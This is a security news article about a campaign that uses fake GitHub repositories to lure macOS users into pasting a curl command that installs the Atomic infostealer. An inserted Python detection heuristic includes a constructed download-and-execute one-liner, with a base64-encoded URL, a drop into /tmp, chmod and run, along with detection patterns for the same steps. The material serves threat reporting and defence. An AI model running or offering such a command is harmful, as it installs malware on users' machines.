
Widespread Infostealer Campaign Targeting macOS Users

Threat actors rely on malicious GitHub repositories to infect LastPass’s macOS users with the Atomic infostealer.


Threat actors are impersonating known brands in an ongoing, widespread campaign aimed at infecting macOS users with information stealer malware, LastPass warns.

As part of the infection chain, the hackers are relying on fraudulent GitHub repositories claiming to provide macOS software from various companies and use search engine optimization (SEO) so that links to the repositories appear at the top of search pages.

“In the case of LastPass, the fraudulent repositories redirected potential victims to a repository that downloads the Atomic infostealer malware,” LastPass says.

LastPass identified two GitHub pages impersonating its brand, both posted to the Microsoft-owned code-sharing platform on 16 September and since taken down.

Both were posted by a user named ‘modhopmduck476’ and contained links claiming to enable users to install ‘LastPass on MacBook’, but redirected to the same malicious page.

A page claiming to offer ‘LastPass Premium on MacBook’ redirected to macprograms-pro[.]com, where users were instructed to copy and paste a command into a terminal window.


The command issues a curl request to an encoded URL, which downloads an ‘Update’ payload into the temporary directory.
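A defender-side heuristic for this infection step, added here as an illustration and not taken from LastPass’s report: it scores a captured terminal command line (from shell history or endpoint process telemetry) for the paste-and-run pattern described above, a downloader fetching a base64-encoded URL and dropping an executable into a temp path. The sample commands and the example.invalid URL are constructed and are not the campaign’s actual command.

```python
import base64
import binascii
import re

# Constructed samples for the demonstration; the URL is a placeholder.
ENCODED_URL = base64.b64encode(b"https://example.invalid/Update").decode()
SUSPICIOUS_CMD = (
    f"echo {ENCODED_URL} | base64 -D | xargs curl -s -o /tmp/Update "
    "&& chmod +x /tmp/Update && /tmp/Update"
)
BENIGN_CMD = "curl -L -o ~/Downloads/report.pdf https://example.invalid/report.pdf"

# Candidate base64 tokens: long runs of the base64 alphabet with optional padding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def _decodes_to_url(token: str) -> bool:
    """True if a base64 token decodes to text containing an HTTP(S) scheme."""
    try:
        text = base64.b64decode(token, validate=True).decode("ascii", "ignore")
    except (binascii.Error, ValueError):
        return False
    return bool(re.search(r"https?://", text))


def analyze_command(cmd: str) -> dict:
    """Score one terminal command; three or more indicators flag it."""
    ind = {
        # A command-line downloader is present.
        "downloader": bool(re.search(r"\b(curl|wget)\b", cmd)),
        # The command decodes base64 inline (macOS uses -D, GNU uses -d).
        "base64_decode": bool(re.search(r"\bbase64\s+(-[dD]|--decode)\b", cmd)),
        # Some base64 token in the command hides a URL.
        "encoded_url": any(_decodes_to_url(t) for t in B64_TOKEN.findall(cmd)),
        # The download lands in a temporary directory.
        "temp_drop": bool(re.search(r"(/tmp/|\$TMPDIR|/private/var/folders/|/var/tmp/)", cmd)),
        # The dropped file is made executable, piped to a shell, or run from temp.
        "exec_after": bool(re.search(r"chmod\s+\+x|\|\s*(ba|z)?sh\b|&&\s*\S*/tmp/\S+", cmd)),
    }
    ind["score"] = sum(ind.values())
    ind["suspicious"] = ind["score"] >= 3
    return ind


def flagged(commands):
    """Return only the commands that trip the heuristic."""
    return [c for c in commands if analyze_command(c)["suspicious"]]


if __name__ == "__main__":
    for c in (SUSPICIOUS_CMD, BENIGN_CMD):
        print(analyze_command(c)["suspicious"], c)
```

The thresholds and regexes are starting points for a hunt query, not a finished rule; tune them against your own baseline of legitimate installer one-liners.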

The payload was the Atomic macOS Stealer (AMOS) infostealer, which has been used in numerous attacks since 2023. In August, CrowdStrike warned of an increase in fraudulent advertisements delivering a variant of AMOS called SHAMOS.

LastPass has observed the threat actors impersonating financial institutions, password managers, technology companies, AI tools, cryptocurrency wallets, and other businesses.

To evade detection, the threat actors used multiple GitHub usernames to create other fake GitHub pages that followed a similar naming pattern, combining the targeted company’s name with Mac-related terminology.

The campaign observed by LastPass has been ongoing since at least July, when Deriv security researcher Dhiraj Mishra warned that Homebrew users were targeted with malicious ads leading to a fake GitHub repository.

The attacks, Mishra pointed out, exploited users’ trust in Google Ads and GitHub, and installed the official Homebrew application to hide the execution of a malicious payload in the background.


Written By

Ionut Arghire is an international correspondent for SecurityWeek.
